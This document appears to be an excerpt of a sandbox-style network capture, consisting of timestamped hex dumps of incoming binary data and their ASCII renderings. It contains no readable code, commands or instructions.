                                                                                                                                  2023-07-18 15:37:06 UTC768INData Raw: 8f 55 d1 35 78 84 21 9b 8a 97 28 3b f6 c5 79 ac 5d 69 26 3f 56 dd 9a de 7c 35 c6 41 92 86 f7 bb 3e aa a0 0e 1f 52 b2 d6 1a de 56 5f fd 95 70 cb e7 d7 62 ba 95 6c f9 0b ac 9a 6d 72 de 30 88 81 21 27 95 63 97 69 af 6b 0a 78 6a 32 4d c3 0e 08 0b 87 12 47 ca 95 f0 19 bd b7 b8 40 8d 13 fb 50 54 81 f4 5d 69 aa 9e 1f d7 77 03 e5 e0 46 a2 4d 93 0d 84 78 bc 9f bb 41 c3 59 5f e3 6c eb a0 83 6d f7 bd 74 82 77 6a fb ed 0f 89 da 51 12 ad 25 1e e1 bf 0a 68 ac 86 12 c5 4a 50 be 76 a4 1b 82 a7 08 26 c3 3c ac ef fc 1c 88 b5 7a 58 4b 36 1d af 24 8e da a4 b2 8e 9e c1 aa ed 6f 0d 92 3b fc 07 cc 75 46 7c d8 87 72 18 af f0 a6 bf eb d0 3a 0d 2f a2 0c 17 32 b2 53 29 b7 cd ec b3 aa ce 81 12 b1 bd f4 e5 2a ff 7f 3c 81 c1 cc 17 f9 95 d9 fe 73 af b3 51 56 41 73 0d d9 bb ca 75 11 c1
                                                                                                                                  Data Ascii: U5x!(;y]i&?V|5A>RV_pblmr0!'cikxj2MG@PT]iwFMxAY_lmtwjQ%hJPv&<zXK6$o;uF|r:/2S)*<sQVAsu
                                                                                                                                  2023-07-18 15:37:06 UTC784INData Raw: 7a 12 af 4a de f8 6b 49 62 3f aa 00 a3 eb 5d e0 49 7e 20 ac 6c 72 28 da a8 61 d1 13 e0 0d af ef 6b 81 ee ec 3c eb e3 be 47 76 61 09 a8 8e 3d 74 89 33 89 1f 14 d9 eb c6 7e 79 b1 0e c4 d4 27 8c c5 02 04 ab 0a 92 5b b3 b7 79 50 ad 3c 65 5c 21 27 f2 d0 6d 89 be b4 da 8c 04 06 7d 28 af df 59 31 e0 96 fa 39 49 5f 6a 38 1e 30 9f 33 bf 6d 88 11 90 4f 1a 7c b4 2b db 7e ff 2e 96 d8 3a eb 2c 22 cf b3 02 08 d6 5c db 65 99 0d 18 d5 c9 fe e5 2d 18 c1 f8 5b 21 21 a2 bc b0 81 e0 81 98 70 8f 55 af 50 eb 86 57 c1 9c 12 25 fd 1b 32 ce 3b 6c d0 65 27 f0 8c 78 15 48 ee 99 c4 18 66 14 57 a3 e1 94 31 14 b1 00 fd ec 8b 80 3b 10 85 99 20 14 6e 42 86 f2 58 5b df a8 96 c8 b4 02 af ca ff 3b ad b8 47 75 3a c2 2e 05 d0 df 43 25 66 e0 8d 02 0a bd eb 3a 00 ba ca 80 f8 2d 30 d8 3d a8 28
                                                                                                                                  Data Ascii: zJkIb?]I~ lr(ak<Gva=t3~y'[yP<e\!'m}(Y19I_j803mO|+~.:,"\e-[!!pUPW%2;le'xHfW1; nBX[;Gu:.C%f:-0=(
                                                                                                                                  2023-07-18 15:37:06 UTC800INData Raw: 94 95 49 88 be 81 6c cd 63 53 e7 aa e5 10 7f db 9d f5 e3 f4 92 ec 2a b9 31 e4 05 ea 76 db 8a 13 08 ce 08 80 3f 6e 73 06 3b d6 f4 0a 88 42 d0 ab 8e 9f 49 a6 eb d2 f7 95 c0 42 ab cd 23 e3 0f f5 3e 63 1d aa cd 90 ac c7 ff a4 35 5c d8 e5 0b 89 40 7f 5b 9e 89 a8 dd b0 ba 46 71 13 3e ee fb 0d f5 69 48 f1 2c 47 b9 19 6c c9 85 88 d5 0d 09 d1 9c 85 c2 53 c6 f9 d8 2c 05 ab fb 0e d2 57 df 6c fb 76 ad 37 ad 47 d5 53 b2 bb 9f 66 d0 0a 3b d9 5e 4f 12 5f 2f 24 d5 44 fa 8d dd f5 7d fb 0a 88 7a f7 54 32 7e 85 6a 05 df 83 c3 3e a9 6d 48 ce 3c c1 53 2c b4 bb a6 0d ce 2c 6c c3 9c 8c 23 11 23 6e c0 3e fd 8c c5 74 94 10 69 a9 28 53 3b 38 4b 00 54 82 0a 19 6a 5f 1a b7 0f 49 10 4c d0 99 69 45 a1 8e dc a4 d8 dd 15 09 e9 4c 2a e6 81 2c 48 79 71 c9 9d 8e 0d c2 c0 1f 2d 78 3b f7 dd
                                                                                                                                  Data Ascii: IlcS*1v?ns;BIB#>c5\@[Fq>iH,GlS,Wlv7GSf;^O_/$D}zT2~j>mH<S,,l##n>ti(S;8KTj_ILiEL*,Hyq-x;
                                                                                                                                  2023-07-18 15:37:06 UTC816INData Raw: a8 35 d7 aa ab 06 16 1e ee 40 12 72 32 a6 b5 27 8a c9 f4 e7 46 71 6b 48 03 88 02 bf e7 13 1f 69 41 f7 08 b7 4b 39 48 92 bb 12 fb 0b 88 af 5c 5a 34 8d 1e dd 2d d7 7d 6f dd 7b 25 b6 c2 98 8f 07 26 e3 a3 01 fc 5e b5 b4 86 a3 af 21 1e 0a 2e 2e ef 6e 6c b6 18 87 32 ee c8 b7 9f b9 46 e9 ac 20 a4 8b aa 39 c6 2a 9d 0e 01 00 21 84 99 1c 66 54 ab fc 00 0a 08 18 65 d7 b8 78 a9 2b 85 9c 2e df 2d c3 f0 00 c2 66 c2 e2 45 88 e2 2d 70 8c 39 97 0f 1e d0 5f f1 82 17 50 e4 8b 1e 26 70 d9 be 5b e8 11 70 b0 20 2f f1 0c 95 d4 5b e2 20 1c 8e c3 f3 b0 2e c4 1a 4e 4a 35 90 be 0a dd d0 c5 ca fb 93 6c 2e 36 6b 8a 6f 00 0f 6c be 61 1c 5e 35 29 7c d3 3c 32 15 f9 02 25 06 4f 0f 75 45 6b 93 1e 9c f7 9c 98 16 3e 3c 98 36 fd 5c 7b 26 e1 09 bc 35 42 3b cf 42 1c 84 4c 6e 07 a2 48 85 41 6d
                                                                                                                                  Data Ascii: 5@r2'FqkHiAK9H\Z4-}o{%&^!..nl2F 9*!fTex+.-fE-p9_P&p[p /[ .NJ5l.6kola^5)|<2%OuEk><6\{&5B;BLnHAm
                                                                                                                                  2023-07-18 15:37:06 UTC832INData Raw: be f0 e4 f8 b7 38 d6 ea 35 2d f3 ed 64 7e 63 29 cd 95 29 a0 4b 46 8b 60 12 da cc 83 9a 9e 47 6e 9a eb 0f 4d ec 0c 65 8d 86 3c 3c 04 9a 32 39 93 ba 88 de 9e e8 89 c0 a3 5b 54 73 bf 56 63 5a d8 8c cf fa 00 26 33 6a b8 65 79 14 5d 3c 90 7f c6 23 f4 a1 52 62 d3 55 d3 c6 58 32 9b 21 9c f7 bf ef ea 0f ef 21 ce 70 d4 56 06 fa 17 49 65 88 38 d0 8d 79 16 8c 1f f8 f3 5c ae de dd dc 5e 7c c5 67 24 cb b6 0f 54 3b 59 58 05 44 34 c9 d7 bb 03 8b f5 32 e2 32 f7 58 d3 38 af 43 11 31 46 f6 0a 71 c2 ad a1 e3 4a 3d a5 f1 dd 02 7d 76 dc 14 b6 14 7a ba 74 61 94 23 ac f6 61 38 83 76 31 b1 d2 95 70 4d 4d 94 b9 5e 83 ff 36 a4 7a 05 48 77 d0 a2 b8 5c 68 89 f4 8b dd ba 67 a6 f0 e9 4d 8b 1d ef 8f ef 29 5a 6a cd 6f 2e ed da dc 5e d0 7e c6 a1 b0 56 97 61 c3 68 fa f1 3a 25 04 b6 f9 b0
                                                                                                                                  Data Ascii: 85-d~c))KF`GnMe<<29[TsVcZ&3jey]<#RbUX2!!pVIe8y\^|g$T;YXD422X8C1FqJ=}vzta#a8v1pMM^6zHw\hgM)Zjo.^~Vah:%
                                                                                                                                  2023-07-18 15:37:06 UTC848INData Raw: 72 90 e0 42 7a e8 00 20 5e a8 4f ca b3 87 aa ba a9 b6 d3 97 4e 0c bb b0 36 1a 1e 63 b7 69 ff 6e 43 32 1f 1d ef 60 af f2 ce fb 35 21 b5 5b 84 19 ab 39 1a b2 0b c6 92 ce df 67 4b f0 5e 80 d6 c2 5c 75 f7 a0 c5 3e 9b 27 f3 83 65 e9 6e 96 10 cf 96 6b 0f 1e 98 53 08 83 0e 87 52 7d 50 7c d4 4c df 65 33 f0 df d5 31 25 fc 2c 9e 59 c0 31 b6 fb 00 b1 45 75 f2 76 f9 c4 db cb 31 16 73 4c e8 a5 dd 1c e8 cb 91 58 d4 33 b8 03 85 7f 65 79 b8 ed 55 ce 53 d5 78 3a 86 61 1e de 5e 11 1f 90 5c 24 c5 7e 5a 27 07 11 e9 1a 3a 60 ea 62 30 a1 dd cc 52 7d 5d 68 f3 13 8f 7e a0 32 26 a2 90 46 c5 a9 a0 34 7d 5f 82 67 f9 3b d3 d2 76 23 50 f7 9d 6d ba 5c 1d 92 c8 fc 2b 60 2f fb 37 b5 a6 f2 ab 25 af 26 32 33 5e 27 13 e1 ae a5 91 61 64 25 1b 38 b5 17 cd 6b 09 80 a4 25 27 2d cd ea c5 5c 99
                                                                                                                                  Data Ascii: rBz ^ON6cinC2`5![9gK^\u>'enkSR}P|Le31%,Y1Euv1sLX3eyUSx:a^\$~Z':`b0R}]h~2&F4}_g;v#Pm\+`/7%&23^'ad%8k%'-\
                                                                                                                                  2023-07-18 15:37:06 UTC864INData Raw: 46 4f 76 0b 4c 4b d0 14 f2 07 13 b8 8e 34 c2 44 44 f7 eb 80 9e 17 fc c1 07 80 95 cb bf 34 77 63 0c 92 f4 78 4c 06 3d c7 14 1c b3 dd 41 7a 52 bf 4e e2 0e 5d 45 1e 65 48 3d 0b c8 13 42 d5 d5 ab 2b 26 0d 67 da 46 d4 6d 73 dc 00 29 19 f3 14 50 1e 3d 1b 93 70 8d fa e9 70 39 e6 df 7e 42 90 d7 7d ad 0d 4b 97 aa 74 96 08 bb be da 52 f3 fc 00 04 f2 e6 52 b1 10 8c 83 f1 8e ae 51 6c 0b a9 c8 c7 f7 90 e1 94 19 52 1d 08 fc ec aa e4 51 95 91 7a c3 79 0f 41 79 1c f7 65 82 87 31 c5 6b fa 69 28 d0 e3 81 2d 78 15 7b 64 c6 04 d4 09 2d 69 5a c4 f8 b1 cf b4 55 ab b4 3d 09 14 79 ba e7 3d 15 63 05 f0 10 0d 97 50 07 ae 0b e3 80 a4 82 56 e9 6b 62 b6 27 92 fd 2f ab 82 02 0c 96 c8 f2 86 1a 5a b8 d9 05 bb 2c 20 2b a6 2a 49 49 53 ae 4d 70 37 8f 28 3b 89 49 cf 98 54 42 63 69 50 f2 ea
                                                                                                                                  Data Ascii: FOvLK4DD4wcxL=AzRN]EeH=B+&gFms)P=pp9~B}KtRRQlRQzyAye1ki(-x{d-iZU=y=cPVkb'/Z, +*IISMp7(;ITBciP
                                                                                                                                  2023-07-18 15:37:06 UTC880INData Raw: f4 3e 87 7d 4b 7b 2c 7b e4 7f f8 30 73 4d c5 4f ec b1 aa 13 70 bd ce a3 0b b2 8c 99 4e 43 31 a0 38 94 0c 78 70 d0 06 07 ba b5 b0 c1 8d ef 59 0c be ec c2 20 c9 bb ac ba 6b cf f6 0c e4 11 5a 12 59 8a 76 ad 89 4b 36 56 9b e1 c9 41 7e 9c 57 1c f3 f4 55 0c f3 de 72 c6 1b d0 2d e4 58 b0 ff 4b cb 9b 9d a2 2f 00 37 99 b3 e8 0c 0a 83 a7 58 c5 02 36 42 27 62 78 43 c3 39 6f b0 0a 55 f4 ae de ba fb 74 34 2d 9b 96 29 81 ef 71 de 7e ee 89 29 9d 37 00 b4 7b a4 c0 29 8b 83 e9 75 03 53 bb 61 7e 45 70 af 1a bd f3 c9 f7 a9 16 52 33 83 d9 a0 f2 88 9a b6 40 ca 97 56 f5 46 74 69 84 c3 3d b5 09 60 ec 2e 0b 58 86 d6 b3 70 67 63 85 6a 47 99 f0 c5 71 eb fa e2 5c b5 20 be 21 79 e0 c6 08 3f 43 7b 5c 7a 18 b0 ac 09 11 6c 73 b0 99 1b 98 b8 72 ff 94 56 bb a4 9d d6 d8 04 97 48 68 4d 32
                                                                                                                                  Data Ascii: >}K{,{0sMOpNC18xpY kZYvK6VA~WUr-XK/7X6B'bxC9oUt4-)q~)7{)uSa~EpR3@VFti=`.XpgcjGq\ !y?C{\zlsrVHhM2
                                                                                                                                  2023-07-18 15:37:06 UTC896INData Raw: a2 ba 28 61 7d e5 bd 4d a8 75 de 68 fd 79 0e 0a 3f 2f 70 04 ce 13 aa 5f 0b 1a 11 69 5f 15 6e 72 33 60 3c 84 4c d3 c4 fa f0 40 5a 05 23 d3 30 7b 0f 4d b7 c1 28 ab 39 df 7e e4 26 17 d0 4b 1e e9 97 26 55 2f a8 c8 ab c5 6f bc 68 db 97 5c ee 56 3b d4 d4 b4 04 bb 25 c8 df 70 ab 47 08 07 2b 32 b9 8a 5f bd e9 05 5f ba 1c 04 d4 08 cb 04 ef 1f e8 52 18 fa d7 47 86 2a 2e 95 ee 8a 81 29 c6 2d bf fb 46 b2 a0 09 a0 6b 29 8c 7c c5 43 a7 50 bb d8 70 68 b0 11 b9 71 3d 77 5b 92 97 68 f6 f7 69 12 a9 ef 4d ed 0e c0 3d 9c 77 e6 3c 64 17 fe 56 f5 5d 95 a2 69 b3 e6 15 d6 87 33 fe da 35 f5 6f 8e 9b 8b 9b 62 e0 d4 7c f4 17 68 68 1f 81 8a 97 d6 c4 98 13 03 92 bb 19 93 35 e5 e8 90 7d ec bb 4c 0c 8e e9 d4 8d 29 47 8f 02 91 16 65 2a 6a f4 52 e4 bb e3 39 ca 9c ef 77 e9 ee 9e c6 fb be
                                                                                                                                  Data Ascii: (a}Muhy?/p_i_nr3`<L@Z#0{M(9~&K&U/oh\V;%pG+2__RG*.)-Fk)|CPphq=w[hiM=w<dV]i35ob|hh5}L)Ge*jR9w
                                                                                                                                  2023-07-18 15:37:06 UTC912INData Raw: 86 d4 e8 35 c4 98 28 c1 71 5b 19 a7 23 e3 17 61 50 49 25 47 2e 37 c3 73 da f1 eb 4d fc 68 05 e5 37 6a 5d 82 ca 2f cb aa 39 3a 7e 31 36 a9 82 a7 54 52 11 49 9c 2e 4a 63 25 ab af 28 0e b4 31 25 78 e7 93 42 c0 40 f9 7c 73 b6 a0 93 83 1a 25 1a 63 16 c9 ab e1 c3 63 5d ec 6c fc 33 3f eb 62 ed 31 df 74 3b 64 b2 4c a4 6e 91 b8 fd 16 94 f7 b3 9f 21 ab d0 0d 5c 68 1f 84 7f e5 0b 8d 81 37 39 da d8 70 02 0a 0d b0 7a 1d 72 02 38 94 b1 ac bb 02 16 eb ef 07 29 6c f9 6c 01 ec 36 0f f1 b7 65 f2 38 f3 35 08 05 f5 61 32 e7 b2 e4 6d 0b b5 9f 21 9e 32 57 0c a0 28 5a 23 48 99 bc 26 67 f1 ce 62 2f 4a ac 23 40 63 ee b9 2b 95 14 21 76 81 56 0d bd 43 5b 07 09 0c 1a 62 99 2e d1 06 ed 57 4d 30 42 e6 5a d7 f0 7a 3d cd 89 2e d4 8e 19 b8 c7 5b 5e 77 25 bd e9 f7 d6 bc 47 f3 a5 0a 57 27
                                                                                                                                  Data Ascii: 5(q[#aPI%G.7sMh7j]/9:~16TRI.Jc%(1%xB@|s%cc]l3?b1t;dLn!\h79pzr8)ll6e85a2m!2W(Z#H&gb/J#@c+!vVC[b.WM0BZz=.[^w%GW'
                                                                                                                                  2023-07-18 15:37:06 UTC928INData Raw: ee 8c 1e bd 90 5e 1d 86 dc 22 dd 5f 72 91 6e 09 90 5a 10 d2 74 b8 ac 9c 7f 86 f9 64 11 79 2c 7c 71 d4 97 63 08 18 76 49 76 57 9a 15 27 ad 0b cf 3f dd c7 1a 14 fc d8 c8 5a ee 87 2e c9 ce 4a 30 78 c9 35 a8 45 1b fb 22 cb 4e 03 57 68 87 97 9d f6 2b 9a 74 f9 c2 1b 6d 34 d1 56 88 f6 2d 56 76 2a 5c 05 b0 fb ca 77 90 07 b5 9b 79 28 75 81 dc 87 7b 75 0c 75 8d f5 88 93 66 73 a1 dc e8 81 46 34 39 f3 79 d3 fe f1 c1 36 4e 5e 40 9b 5d a1 5f 49 ab 69 c0 ad d3 32 0d 10 ed 33 84 f0 ca ad eb 54 86 27 6d b5 a2 97 7d 25 07 45 9c ca 79 2c 4f 64 68 ce fa e7 78 72 2a 27 f3 b7 65 2c 97 0c 11 1a 17 ed be dc 22 ea 9c 56 55 70 51 a9 80 d4 69 6a e2 d0 ac 49 d6 5c 2c 36 98 35 93 20 b7 b6 ca d8 33 4e d6 d4 7b b1 f2 94 9d 29 6b 5a ea 87 99 90 51 88 21 bd 09 2e 34 21 04 2e d2 4b 49 61
                                                                                                                                  Data Ascii: ^"_rnZtdy,|qcvIvW'?Z.J0x5E"NWh+tm4V-Vv*\wy(u{uufsF49y6N^@]_Ii23T'm}%Ey,Odhxr*'e,"VUpQijI\,65 3N{)kZQ!.4!.KIa
                                                                                                                                  2023-07-18 15:37:06 UTC944INData Raw: 93 c1 db 50 1d 53 22 41 2f f2 3b 7c 80 8c bb d3 e5 44 bb b7 1c 62 6f d5 6b 5b a3 4e af 3c 1e 83 67 15 13 59 1c ac 1f 8e cc 63 44 1f e6 5c 72 09 7c 14 e1 2a f3 fb 1b f9 07 33 5b ab c3 c2 db 13 a7 4e 81 c7 17 83 b6 2e a1 05 8c ad 24 f9 cb ed 67 56 f4 6c 4c 2c bd f8 3b 63 30 47 ff 1f 35 cd 9a 16 82 43 10 c8 9c 55 d2 57 5b 71 b1 dd f7 e5 52 52 f5 11 35 c9 e0 8d 7b 44 00 b5 2c fb de 1c 03 0e a3 d6 7e a6 0e 5e c9 42 16 b6 f6 1f c7 5f 4a 51 4e cd 57 d9 f2 ec f0 d9 00 00 95 ed 37 55 0c 56 63 a1 ca c0 5c e6 b1 d9 5c 31 4c 9a 44 dc 15 3b 27 68 c4 87 a3 0f ea e7 64 20 98 98 f7 69 58 2f cf 6d 82 e0 de 5d 9d e2 c8 ce a7 ef e3 b1 cf fa 99 77 b5 9c 7e 8c b4 f0 ff 88 17 79 85 8d df 8e 07 2e b9 17 11 c1 c4 2f 50 ca 08 ff 3f 79 50 ca ec e9 09 58 fd 9c af b5 07 bb 98 54 db
                                                                                                                                  Data Ascii: PS"A/;|Dbok[N<gYcD\r|*3[N.$gVlL,;c0G5CUW[qRR5{D,~^B_JQNW7UVc\\1LD;'hd iX/m]w~y./P?yPXT
                                                                                                                                  2023-07-18 15:37:06 UTC960INData Raw: a7 a5 0c e2 0a 66 84 10 f2 2d 10 d4 07 a2 11 34 e8 78 30 03 04 2e 1f 39 47 3f 68 4b f6 45 d1 90 d9 43 f3 9f 57 64 be 0a e7 ea f4 bf 25 59 e5 b2 c0 aa 38 d3 83 4d a9 02 cc 2c 85 fa 06 fa 44 33 d7 7d f1 1e a3 93 15 27 37 5f ef 22 ec 0a e0 81 a8 ec 12 8a b8 55 a3 37 bd 34 d3 ea 7a f1 07 c6 08 5a ed 25 03 47 3c e1 7f 21 6c f8 b2 35 96 f2 1a 8a f1 9d 75 c4 47 0a 78 29 6a fe b5 c7 a4 72 22 81 3e 9c 5d 38 76 35 c4 08 16 4e 61 d1 04 1d 07 67 58 05 71 e1 a6 45 ca c2 a6 9f cb 0f a9 65 5f 08 b3 53 bf 53 a6 1e 74 28 72 88 71 3d 6a f3 7e a7 f1 99 a1 f5 97 7c 89 2e 08 9b 8d 1d 5d 30 52 72 57 3a 5d 4b fd 6f 9e 8b e3 65 aa 02 57 53 7c 90 2c d0 4b 53 46 3f bd 36 53 7d b0 5f 1c 54 2f 05 4d f8 53 23 63 a7 7a 4b 41 0e ed 10 b8 85 1a 61 30 13 eb 50 f8 fa e5 9a fa 7a 4d bd 6f
                                                                                                                                  Data Ascii: f-4x0.9G?hKECWd%Y8M,D3}'7_"U74zZ%G<!l5uGx)jr">]8v5NagXqEe_SSt(rq=j~|.]0RrW:]KoeWS|,KSF?6S}_T/MS#czKAa0PzMo
                                                                                                                                  2023-07-18 15:37:06 UTC976INData Raw: e2 69 1c 01 95 1a 5e 39 c6 2a 51 91 d1 31 a5 07 df 78 36 3d 7d 6c d3 8b d3 b6 35 93 46 60 75 a1 42 6b 6a 50 f1 38 f6 18 a7 3e 71 21 15 f0 32 f5 ba 6b ba ff cd 2c 2c 18 6d 58 6d db bb 15 c7 b6 80 6d db 22 58 a8 af 9d 82 4e 1a 4c 73 8c 3f c3 2d ef 47 bb 27 b4 4e 97 7c 15 4a 7e e6 dc 7f d7 ca cc b5 d9 7c b4 0e 01 c7 9c c5 e7 67 d8 1c 5a fb 4e e4 6a b8 9d d1 de 86 0d 95 5e dc 32 14 96 d9 e6 68 6a 08 ff 1a c5 82 73 7e 37 a4 a6 4d 56 52 5d 6a a1 4a 5a 8a af 07 cd 35 e6 63 fb 61 76 f8 0b 38 72 c9 f5 46 ce 23 bb 2c b8 98 58 9a 05 c9 9f 44 3a ad 6e 5f 51 b1 9f ff 2f 12 77 5b f8 43 78 fd 81 b0 ee 0e e0 a3 bb ef 83 9b bb d5 75 50 50 c5 ee de a4 ab 88 f3 e7 1d 2a f1 57 26 2b 73 79 ce 33 88 12 73 17 c4 49 4d 13 77 22 6d a0 96 0a 64 e0 69 c0 20 a5 30 6e 17 45 f1 ed 6c
                                                                                                                                  Data Ascii: i^9*Q1x6=}l5F`uBkjP8>q!2k,,mXmm"XNLs?-G'N|J~|gZNj^2hjs~7MVR]jJZ5cav8rF#,XD:n_Q/w[CxuPP*W&+sy3sIMw"mdi 0nEl
                                                                                                                                  2023-07-18 15:37:06 UTC992INData Raw: 9f 01 aa e2 e7 8b 9a cd 5a 55 ad 41 90 fc a0 4f d2 31 26 4a c4 99 5d f6 55 44 dd 15 cc 00 20 fd a2 86 6f 8c 27 79 bc ce 43 0c ee ba db 86 27 71 e2 c8 b6 5a fe dd 50 69 54 08 e6 b4 9e 92 d3 21 32 de bc ac 37 28 58 e0 37 89 86 2c df 72 16 1a 73 b1 9a 12 06 11 df 1b 9d b8 0f d7 57 cc c1 31 1e fa 19 1a 69 54 dd 3b 01 f3 88 0f 85 a5 dd 42 b3 98 be ad 18 f2 c3 e8 09 61 ca a3 eb 40 10 5e 36 a3 6f bc 9b 01 83 ad ca a6 6f fe fd c1 3c 17 e0 ab 1c 06 59 13 c3 c9 be 9f e7 31 56 06 92 9d 62 bb 27 df 7c 22 8b 5a 3b 8a 42 63 3a 0d 41 f0 04 52 fb 4c 88 7d 04 18 11 5b 2f 8a 0f 0b 1b c8 30 42 99 fd 6e a3 62 c5 cc f4 3b ac 6c e8 15 23 43 07 57 d7 8b 7c 66 8c 10 67 25 ce 4d 19 71 5c 2b f9 cf 3c 64 51 3d 70 9a 66 b6 d1 86 6b 69 a6 01 a2 81 7f 45 2a 90 03 c4 b9 2e 09 23 80 d0
                                                                                                                                  Data Ascii: ZUAO1&J]UD o'yC'qZPiT!27(X7,rsW1iT;Ba@^6oo<Y1Vb'|"Z;Bc:ARL}[/0Bnb;l#CW|fg%Mq\+<dQ=pfkiE*.#
                                                                                                                                  2023-07-18 15:37:06 UTC1008INData Raw: ad 80 2a 0d 9b 68 fd 02 14 cd 6e d1 3c 08 c8 1d 37 9e 3e e5 a5 fd a8 c2 e0 2f a2 b2 1e 85 02 f4 51 b8 5b cc c8 b8 aa 4b 00 9f dc 4e 8b a2 d8 31 33 95 46 81 4c 46 13 f7 36 7a 53 2b 11 58 c8 27 5f 5c 6d 54 91 ca 1d f5 7c 7f 29 1b 43 bb de 44 ec 2a f7 d6 e2 77 82 2d 3b f0 a8 3c d8 2f cf fc 2c f8 6c 61 a3 e3 0d c2 33 02 00 5d 12 6d 46 8c a9 36 ae 8b 8a cc a5 66 e5 fb ff 31 f8 23 2c 22 17 6b e1 62 0e 0c 4d fb a6 a7 a5 ea fd 5e 94 d2 c1 1c e7 66 8f c6 81 91 37 1f 0d ba db 26 d7 a9 80 42 bd 4f c0 37 68 5f f9 b9 df 09 86 db 3a 60 5a 99 7d 12 07 eb 13 45 13 f5 8d 7a 1c 30 89 86 ff a9 fd e3 47 ac 12 eb 2a 5e 3e c8 02 79 2a ba 59 64 97 ed e3 1b 8f 2f f5 d4 17 0a 2c 22 86 a9 64 68 b5 73 3e 7c a2 f0 f6 b4 d3 2f 61 5c d3 57 84 d8 2f ba 52 13 bf d2 1c b1 f1 64 1a a3 7e
                                                                                                                                  Data Ascii: *hn<7>/Q[KN13FLF6zS+X'_\mT|)CD*w-;</,la3]mF6f1#,"kbM^f7&BO7h_:`Z}Ez0G*^>y*Yd/,"dhs>|/a\W/Rd~
                                                                                                                                  2023-07-18 15:37:06 UTC1024INData Raw: 7a ba 8d 29 45 9d 8b 4b f8 a6 51 a4 46 5e 2f 51 a0 37 67 46 e2 5c 15 29 72 00 d0 6d 9e de 4f b3 f2 66 71 3a 05 86 d1 d6 63 ad 71 08 fc 39 4f 12 5c b4 08 56 48 f4 5a 2f 97 5d 04 6b ee 41 91 34 8e 38 0e 02 02 7e 57 46 05 46 dc 80 10 f7 4b 56 7f 15 2b 36 4c a9 77 50 97 46 4b 75 5e e4 c9 33 e7 61 d0 17 9a 23 e8 26 e1 ba f0 5c 17 b8 60 f8 ab a8 53 dc 0e ff 32 c0 03 8c c2 a7 83 96 20 ef 3b de 2e ba 76 3a 03 64 69 ba 42 f7 59 8c 86 ff 12 e8 e3 b8 ee 28 04 d0 f4 22 30 07 73 97 dd 53 fe 93 d0 e7 b5 cc 51 5d e1 33 c9 b0 a8 78 d8 4d 2b 0e d6 70 ac ef 6a ba 6e b0 fa bd 19 31 74 99 c7 04 80 d4 a9 a6 56 e0 cf 5b 77 51 0c 44 cf ea 6e 72 81 7b 23 03 39 00 de 12 82 4d 33 d6 51 66 80 39 c0 05 39 2d 63 a0 4e 9b 8b 6c ab 79 76 91 91 64 e9 2d d2 fc fe 3d ff 47 e7 92 8d 70 1f
                                                                                                                                  Data Ascii: z)EKQF^/Q7gF\)rmOfq:cq9O\VHZ/]kA48~WFFKV+6LwPFKu^3a#&\`S2 ;.v:diBY("0sSQ]3xM+pjn1tV[wQDnr{#9M3Qf99-cNlyvd-=Gp
                                                                                                                                  2023-07-18 15:37:06 UTC1040INData Raw: 7b 11 2e 91 f2 90 33 4d d9 cb 43 ca 25 ea c6 23 1f ce a1 83 4b e3 87 8f b1 cf 3e da 37 53 e8 20 c0 57 60 41 fd 00 58 b6 5f e0 30 0b b6 ee a5 9e a7 43 0c ec 91 3f 0d 33 20 6b 55 b3 82 cf bd ec eb 89 a1 20 de 15 b3 03 d8 86 46 f3 70 c1 26 d1 49 91 5a a1 06 03 15 44 a7 13 b0 3a f3 5b f3 bc eb 14 c8 4a 7d bb bf 64 5d 0c b8 53 50 42 e1 b1 83 01 40 05 b7 91 d9 be 1d 43 97 8f 3a c4 b5 3f ab f7 1a 94 cd fd ce 6b 67 3d ac df a2 3d 99 f9 c3 a0 e2 c8 10 64 6b de 3f 84 73 b4 b7 41 5f 00 68 19 33 4f 2a b9 5e bc e2 19 bd 28 a7 b9 6d 0f 2b a6 40 f0 7a 8e 29 27 17 ab bc 80 91 e6 b5 c8 52 9c e5 81 3a c5 46 d7 f0 72 bb 58 40 b6 f5 a0 14 a2 4d 2f 14 58 40 29 e6 de 1a e8 44 4c 51 fb ca 78 38 97 32 7a 99 13 92 6e 83 60 7d 35 2a 14 b0 f4 36 69 c0 1d 33 55 e1 4c 5a fe cf 53 98
                                                                                                                                  Data Ascii: {.3MC%#K>7S W`AX_0C?3 kU Fp&IZD:[J}d]SPB@C:?kg==dk?sA_h3O*^(m+@z)'R:FrX@M/X@)DLQx82zn`}5*6i3ULZS
                                                                                                                                  2023-07-18 15:37:06 UTC1056INData Raw: 1d 40 3c a9 f5 69 a9 b8 8a 77 0c de 16 a5 ad a8 01 d6 2a d9 bb 57 fd 7a f2 c4 39 66 c1 1c 96 0e d0 b1 e1 11 6a 31 61 ac b3 29 f5 a5 a2 84 95 4f 2c af 82 29 19 94 e0 91 13 09 a6 69 a7 ae 24 37 16 c8 60 04 41 c1 50 8f bc 2a 5f b3 44 16 0a 6f b6 d4 a9 58 38 76 e6 7d 4c 3a 23 78 c1 58 f3 99 46 ea 4e c2 ee 54 b9 d0 51 79 66 7e ea 00 d0 ad 87 13 5c 62 3f 9b 7c 71 2f f8 97 4e 89 7d 62 7f 05 ab 02 39 41 3d e4 09 57 87 ea 59 be 8e f2 c9 f6 a2 7d b5 6d 56 2a 7d 8f 73 ac b8 ec 1e b0 69 7a 3d 30 9d 05 a1 de b5 3c 9a f3 91 c7 58 1f 4b 90 6a 06 65 eb 83 a0 71 9a b9 46 af 0d 7c ad b2 b2 fd 3f 6b 4b 9e 67 81 b8 51 f2 89 bb f3 ee e0 04 f5 0f 2a 19 ae 6a 48 fd d9 31 f0 6b 94 8a 21 1e 76 ac a1 15 c7 27 dc 32 50 20 02 c1 1f d3 d2 1c 05 83 54 df 9f b5 3e 8a 85 16 0d 35 db d2
                                                                                                                                  Data Ascii: @<iw*Wz9fj1a)O,)i$7`AP*_DoX8v}L:#xXFNTQyf~\b?|q/N}b9A=WY}mV*}siz=0<XKjeqF|?kKgQ*jH1k!v'2P T>5
